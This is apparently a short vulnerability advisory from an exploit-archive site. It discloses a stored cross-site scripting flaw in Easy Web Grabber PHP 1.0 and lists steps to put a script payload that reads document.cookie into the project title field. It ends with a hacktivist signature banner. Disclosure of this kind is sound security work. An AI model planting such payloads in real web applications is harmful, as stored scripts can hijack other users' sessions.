Easy Web Grabber 1.0.0 Cross Site Scripting

Easy Web Grabber version 1.0.0 suffers from a persistent cross site scripting vulnerability.


MD5 | 1b61b1b865df691a1b85a1ae03c03286

# Exploit Title: Easy Web Grabber PHP - xss
# Google Dork: N/A
# Date: 2017/31/12
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: https://www.codester.com/risioja
# Software Buy: https://www.codester.com/items/5292/easy-web-grabber-php
# Demo: http://winnky.000webhostapp.com/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# Exploit :

Hi 2 All
1. go to Projects page:
2. click to "Create new project"
3. insert to textbox "Project title:" -> <script>alert(document.cookie);</script> or <script>alert(/ShanoWeb/);</script>
4. click to SUBMIT ...


:D

./
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|
| Find and patch bug in your website and system|
| Contact : Mr[dot]Net2Net[at]Gmail[dot]com |
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|

|=============================================================|
/-------------------------------------------------------------\
| My Message To |
\-------------------------------------------------------------/
|= [!] Make Love,Not War!. Peace No War!
|= [!] We Are One!
|= [!] We are Legion,We do not Forgive,We Do not Forge
|= [!] We Love All Children from Palestine
|=============================================================|

Related Posts

Comments